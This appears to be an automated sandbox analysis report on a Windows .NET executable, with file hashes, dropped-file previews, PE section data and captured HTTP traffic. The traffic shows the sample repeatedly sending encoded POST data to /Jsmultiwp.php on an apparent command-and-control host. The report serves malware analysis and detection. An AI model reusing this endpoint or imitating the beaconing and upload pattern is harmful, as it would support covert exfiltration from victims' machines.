SHA-512:	5341E3018678BBE59B8830DDBFC2149FCA2846014352FAC9C89E382DB0FF4A0CA71D80F8852FBA0ABBF7CC0DA7E9C83EEDC7DEBC8F34F260960BEA2F3A34D86A
Malicious:	false
Preview:	H...... .......A.......X\...;...{......................0.!..........{A.&....\|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................6..'....\|1..................w..'....\|[..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulxmH/lZ:NllUg
MD5:	D904BDD752B6F23D81E93ECA3BD8E0F3
SHA1:	026D8B0D0F79861746760B0431AD46BAD2A01676
SHA-256:	B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
SHA-512:	5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
Malicious:	false
Preview:	@...e................................. ..............@..........

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Tue Dec 10 19:09:00 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1956
Entropy (8bit):	4.560531372279441
Encrypted:	false
SSDEEP:	24:HrO9/OgT5mtDfHdFYwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:1g9mx9VKhmMluOulajfqXSfbNtmh1Z
MD5:	0C5CB4B195F5B84588F98E183755C58C
SHA1:	7ECC9FD55589C5D89FD021E7A77D85F416C4A0BD
SHA-256:	2F641A186A35AC7E9958F5291078A7E5E7AA33105CE869535C1833625F4F8E51
SHA-512:	48739B7674F590B31F95B3A9A5F33DD10079DAAD440C2A0020F0430A5E7F8ADBAC3EED7FDCE850927FF9892DB3DE68935BD0895EC85DAE1EB3E45E9F7A91DFBD
Malicious:	false
Preview:	L....Xg.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...\|...............@..@........=....c:\Windows\System32\CSCC8A66A2F354641BDBF8E147B9A2D7E9B.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES8919.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.78781006809566
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXzFXv7fjNvo5VZFAXaNvj:Vx993DEUUFXv7fGLZFy8
MD5:	76270493090C2DEB5076715A4DF71760
SHA1:	E558BBF4031026E86D281797D491DF15FAC764CF
SHA-256:	1A49694CECC38813DD0673F9BA98DBDCDCD8D6E9071E0617FADF5B3019D688E7
SHA-512:	9B05EE9017637F9E96D81B6F1E4340BACFC345DC68C86F431534E066F82A960C3573638B447ED1F1009872E95E5BB96DEA58B3727BBA4965BB6C0BAE6A7DC1C7
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 10/12/2024 14:09:04..14:09:04, error: 0x80072746.14:09:09, error: 0x80072746.

Entrypoint:	0x5e039e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67474066 [Wed Nov 27 15:53:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e0350	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e2000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1de3a4	0x1de400	5b7f4d57c73f0923709f373874197154	False	0.7832771456808677	data	7.555073987018635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1e2000	0x320	0x400	10a44baa6b63fca2f6945c87c4ae48fb	False	0.3525390625	data	2.6502033736331296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1e4000	0xc	0x200	10ed820521375f89526725da4eed15ce	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 19:00:30.867041111 CET	54340	53	192.168.2.4	1.1.1.1
Dec 10, 2024 19:00:31.593157053 CET	53	54340	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:31.743418932 CET	322	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:00:32.097429037 CET	344	OUT	Data Raw: 00 07 04 04 06 0a 04 06 05 06 02 01 02 07 01 01 00 06 05 0c 02 03 03 0f 02 03 0a 03 04 0e 06 01 0f 05 06 5a 01 03 04 01 0c 00 04 04 07 00 02 07 06 54 0f 09 0d 50 06 56 06 50 04 57 06 51 05 0e 01 05 0e 0c 00 07 04 05 0d 01 0e 01 0f 03 0c 09 04 03 Data Ascii: ZTPVPWQ[PPP\L~~`Xc[r]aeRz_`lcXh]p{R]{czShtg`~O~V@AxSb~LS
Dec 10, 2024 19:00:32.820439100 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:33.078632116 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AI%2F0CYl6KzkcaSmhgD7D4A8qXalg47%2B42kakeYoFdpEgXKqblzyJ3mpVlq1h4LlXk6CnZeIk2YnXEfyKNrcR0qdDYUulc3bfx3YZPU12qmAr0YMmh7AVRigZtqs2llmuqEj5%2BgR%2FxSg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff229428551851-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4267&min_rtt=1688&rtt_var=5792&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=666&delivery_rate=65397&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 30 0d 0a 56 4a 7d 5d 7a 7d 56 5f 6f 5c 59 5b 7c 62 60 5e 7e 67 51 4f 7e 60 75 08 6d 4d 5d 59 7f 71 73 59 63 5d 6a 53 6d 5f 57 02 62 58 6b 5f 7e 61 78 01 55 4b 71 42 60 4c 60 5e 6b 5c 7d 4f 6b 01 65 55 78 58 73 53 69 5d 74 5a 75 04 6d 4f 63 72 71 47 7c 5f 57 58 7d 6f 64 40 6a 67 51 44 62 66 7b 06 7c 5b 76 59 69 60 7a 5f 6f 59 78 04 7b 77 5a 07 78 53 55 00 6e 62 78 05 6c 05 71 5d 7c 5e 51 5b 7b 59 7c 07 7d 04 64 5f 62 61 78 02 7a 51 41 5b 7f 74 68 4f 6b 61 5f 41 76 6f 6f 5f 7b 6f 7b 5d 74 5e 76 0d 7b 71 71 47 69 7c 69 5c 78 5f 7e 49 62 73 77 44 76 5f 77 5f 63 61 54 50 7e 5d 7a 06 63 5b 7d 04 76 66 63 50 7f 6f 75 00 77 7c 70 04 7c 60 7c 02 78 6f 67 03 6c 5e 66 02 7c 6d 6b 51 77 59 6f 5c 69 62 6d 50 7e 6e 78 50 78 0b 6e 4c 69 04 61 4d 7b 5d 46 51 7f 55 6b 51 6a 5e 70 0d 69 67 79 58 7b 7d 73 01 79 62 5a 00 7f 5f 7f 49 6a 59 70 50 6b 63 7e 54 6e 60 73 5f 6a 5c 6c 01 76 63 57 51 7b 5c 79 49 77 66 52 01 7c 66 68 07 7d 58 53 4f 77 4c 55 4a 7d 72 53 07 7f 77 58 09 78 66 70 0c 7e 73 63 04 76 5c 71 04 74 [TRUNCATED] Data Ascii: 540VJ}]z}V_o\Y[\|b`^~gQO~`umM]YqsYc]jSm_WbXk_~axUKqB`L`^k\}OkeUxXsSi]tZumOcrqG\|_WX}od@jgQDbf{\|[vYi`z_oYx{wZxSUnbxlq]\|^Q[{Y\|}d_baxzQA[thOka_Avoo_{o{]t^v{qqGi\|i\x_~IbswDv_w_caTP~]zc[}vfcPouw\|p\|`\|xogl^f\|mkQwYo\ibmP~nxPxnLiaM{]FQUkQj^pigyX{}sybZ_IjYpPkc~Tn`s_j\lvcWQ{\yIwfR\|fh}XSOwLUJ}rSwXxfp~scv\qtOq~aX~R\|}gu_sJxbi~pyI{Ih{g^{}xrl{]nO`\|IxYdI~rwa^~RgKg`\|aau\|Zxl`vpvyaWG\|lrAxOvws
Dec 10, 2024 19:00:33.078660011 CET	917	IN	Data Raw: 55 4b 76 5f 7c 04 74 4f 50 0c 7c 70 54 40 77 4c 75 4f 77 75 68 08 7c 6c 71 4f 76 7c 68 4d 7e 63 68 07 7b 42 67 01 78 5e 62 01 7c 6d 60 0c 74 77 6c 02 7e 72 5c 41 7d 43 73 0a 7b 7d 7e 04 7f 62 75 06 7f 60 70 0b 7f 6c 60 09 7e 4e 78 0c 7e 77 66 4d Data Ascii: UKv_\|tOP\|pT@wLuOwuh\|lqOv\|hM~ch{Bgx^b\|m`twl~r\A}Cs{}~bu`pl`~Nx~wfM{CYKyrhFqsI~Io~`SyMl~LxKwsSByauuXZ}vx@vuvrkreO}gfyfl}]{wr}tqqajH~lpA}YkKvas{biG}^SKxIp{gRy}yLpKx]z{]NZ{Y^}rcu_QYjRp^\|^dA\|rmAvoo_lodFw`[Sm
Dec 10, 2024 19:00:33.138022900 CET	298	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 380 Expect: 100-continue
Dec 10, 2024 19:00:33.464736938 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:33.465121031 CET	380	OUT	Data Raw: 50 5d 58 5e 5d 5b 50 50 5c 56 5b 59 50 5d 5a 5c 50 5b 59 5b 50 5b 53 5c 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: P]X^][PP\V[YP]Z\P[Y[P[S\_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#^&-Y(? [!+4 Z(%8 $;64/461#V/;$_" X(7
Dec 10, 2024 19:00:33.938240051 CET	963	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DDKKOu4BUdtNC2g3hwyjVcZwpdhqvxQCwaCLyidX71RxMiDLaeaKHlEVrKbr7ODG3Tsucw%2FgNBH4kvGTNhYIG12V%2FfKMdx4O3tryPhElwZy0EvZQgBBE4c9t5pUQ%2BhroG1KJQNChys8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22982d611851-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6489&min_rtt=1688&rtt_var=8804&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2203&recv_bytes=1344&delivery_rate=2507155&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 03 15 24 06 37 5d 34 08 36 54 31 59 2e 00 24 5d 2d 28 09 5d 2e 06 21 5e 21 5f 32 5a 2e 05 21 01 28 3b 28 06 32 1c 3a 12 27 26 21 57 3e 1e 28 51 06 1c 26 02 27 14 36 53 3c 3c 3e 06 24 5b 38 58 3d 37 29 5d 3d 3d 2f 51 20 05 12 5e 25 3d 38 09 3f 2f 2e 0d 27 2c 3a 1a 3b 23 3a 06 25 3d 2a 51 00 16 21 55 28 32 23 00 23 1e 03 0d 22 32 20 5f 3c 35 23 58 33 3d 09 0e 33 2c 0c 5b 27 12 2c 06 27 11 04 0d 24 2c 3b 5c 23 59 37 50 31 19 23 5d 2d 03 28 57 00 3f 5a 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 98$7]46T1Y.$]-(].!^!_2Z.!(;(2:'&!W>(Q&'6S<<>$[8X=7)]==/Q ^%=8?/.',:;#:%=*Q!U(2##"2 _<5#X3=3,[','$,;\#Y7P1#]-(W?ZO0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:34.693880081 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:00:35.047480106 CET	1852	OUT	Data Raw: 50 5e 5d 52 5d 5f 50 57 5c 56 5b 59 50 58 5a 5a 50 54 59 58 50 5d 53 5b 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: P^]R]_PW\V[YPXZZPTYXP]S[_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_ 2>?,$6$;=-#<(38&;5V (!];?46W4;+$_" X(7
Dec 10, 2024 19:00:35.786709070 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:36.311364889 CET	961	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ySietLLoDR0GgyYMhe5myVHUTatdGKUBjgLndBU6mn1c0ru7dwVWi9XadoVOp3FopzY7PHwyGcv3bWZ2wSzkMFbie0XmsWqxP%2F0x1a8kyLZZlAqh%2BJOB8%2BIepAgfz3kkK1v3JOJ%2FguI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22a6bd984239-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4652&min_rtt=1613&rtt_var=6684&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2175&delivery_rate=56307&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 03 15 27 12 20 5d 2b 1d 20 32 3d 5b 39 3a 24 10 2e 06 3b 17 2d 3b 35 1b 36 29 0c 59 3a 3f 3e 5f 3f 5d 3f 5e 25 1c 26 59 33 50 2d 52 29 24 28 51 06 1c 25 5f 30 2a 3d 0b 3c 11 0b 5e 24 5b 3c 5f 29 0e 26 03 3e 3e 2c 0e 23 5d 27 03 26 04 33 19 2a 2f 39 52 30 3c 21 41 38 55 21 5b 31 3d 2a 51 00 16 21 17 28 32 24 13 34 30 3e 1c 35 1c 34 19 28 35 3b 12 33 04 28 51 27 2f 22 58 30 02 2b 59 27 3c 26 0f 30 3f 3c 04 23 3c 24 08 27 33 23 5d 2d 03 28 57 00 3f 5a 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 98' ]+ 2=[9:$.;-;56)Y:?>_?]?^%&Y3P-R)$(Q%_0=<^$[<_)&>>,#]'&3/9R0<!A8U![1=*Q!(2$40>54(5;3(Q'/"X0+Y'<&0?<#<$'3#]-(W?ZO0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:34.698431969 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue
Dec 10, 2024 19:00:35.057224989 CET	2528	OUT	Data Raw: 50 59 5d 5e 5d 5c 55 57 5c 56 5b 59 50 5c 5a 5e 50 5a 59 59 50 58 53 5c 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: PY]^]\UW\V[YP\Z^PZYYPXS\_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#X1U!(/;"C*1 +]$(/]%;#(X,?]5+S/;$_" X('
Dec 10, 2024 19:00:35.792491913 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:36.250559092 CET	810	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qsn2U5vMHUAUyECbXhRhVVy50Leoy3NVzf%2B3phF8l0Xje%2Flti3GewFSbOCXLVbe8fKaF1%2Fb7vLUUJ1Y6QACxq9bFhUEhCtl9IG3TolLnR66Sh9v7vuibVAaeyh69qLYQw3oqHHLbfoM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22a6be4a431b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4169&min_rtt=1833&rtt_var=5361&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=71122&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:36.879673958 CET	299	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue
Dec 10, 2024 19:00:37.229249954 CET	2528	OUT	Data Raw: 50 5e 5d 59 5d 5e 55 55 5c 56 5b 59 50 58 5a 5c 50 5c 59 59 50 5c 53 5d 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: P^]Y]^UU\V[YPXZ\P\YYP\S]_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#' >=,(Y"40A>$.#< '(/_2U"(5]/?4""(,;$_" X(7
Dec 10, 2024 19:00:38.034523964 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:38.363261938 CET	821	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AFIyPyMdJC57nvxnrj%2B%2BBuBu7UFZHQrLCLhI79o%2BrZFwSZVx%2B0a7YyF73SqgXClIYpgpBqxaQX%2B%2Fh7hXNKyRMnNxjByLTkzTjuwiKYY88Tvin3%2B5AewKW313AhtbzSLou9%2BjzdWSKsM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22b4bc1cc339-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2830&min_rtt=1634&rtt_var=3005&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=130310&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:39.738601923 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 2528 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:00:40.094584942 CET	2528	OUT	Data Raw: 50 5d 5d 5c 5d 5e 50 56 5c 56 5b 59 50 59 5a 50 50 5a 59 59 50 5e 53 5a 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: P]]\]^PV\V[YPYZPPZYYP^SZ_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#^&3[</8!'+7!#?]0+1+5 %\/8 2(8$_" X(3
Dec 10, 2024 19:00:40.823677063 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 19:00:41.152836084 CET	816	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 18:00:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mjai2n%2B6OC%2Bv0PMh3eTReZrDXEIG%2FmQ%2Bp56vlDA5CKZSeFr5XYUWGoLxFwYLTuCs8%2BzzB6OLEcL7uwUAVagUIw8eirKQvHyyw4AvaxNzc6spI7LEJo3AcWAno4mNmfo%2B1bd7lZlyBfE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eff22c62f75c445-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3768&min_rtt=1576&rtt_var=4975&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=76387&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 31 5d 5e 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 41]^V0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 19:00:41.452280045 CET	323	OUT	POST /Jsmultiwp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 817087cm.nyashteam.ru Content-Length: 1828 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 19:00:41.816164970 CET	1828	OUT	Data Raw: 55 5d 5d 5d 5d 5b 50 53 5c 56 5b 59 50 5e 5a 5e 50 55 59 5f 50 5e 53 5e 5f 58 5d 5d 55 59 58 5f 41 5a 50 5c 5d 57 50 5f 5c 53 57 5a 54 53 52 55 50 50 5f 5e 5c 5f 54 56 56 5e 5e 5f 59 5c 5f 59 54 56 5f 5b 54 5f 51 56 5b 5e 42 59 58 5c 5c 52 53 5a Data Ascii: U]]]][PS\V[YP^Z^PUY_P^S^_X]]UYX_AZP\]WP_\SWZTSRUPP_^\_TVV^^_Y\_YTV_[T_QV[^BYX\\RSZ[P_Y_@WT^Z[]UQV\^SPQBX[U\R__GXUIQ[\]^WZ^QXY^\^Y[[PY]\^^X]U^DYXWXT\UUYB_YYS_PT]FU\Z[_X[WHZPZSPWXYY_YY\_#\& "=<"$* $3+Y%;!7;.8,7[6#T;+$_" X(/
Dec 10, 2024 19:00:42.555075884 CET	25	IN	HTTP/1.1 100 Continue
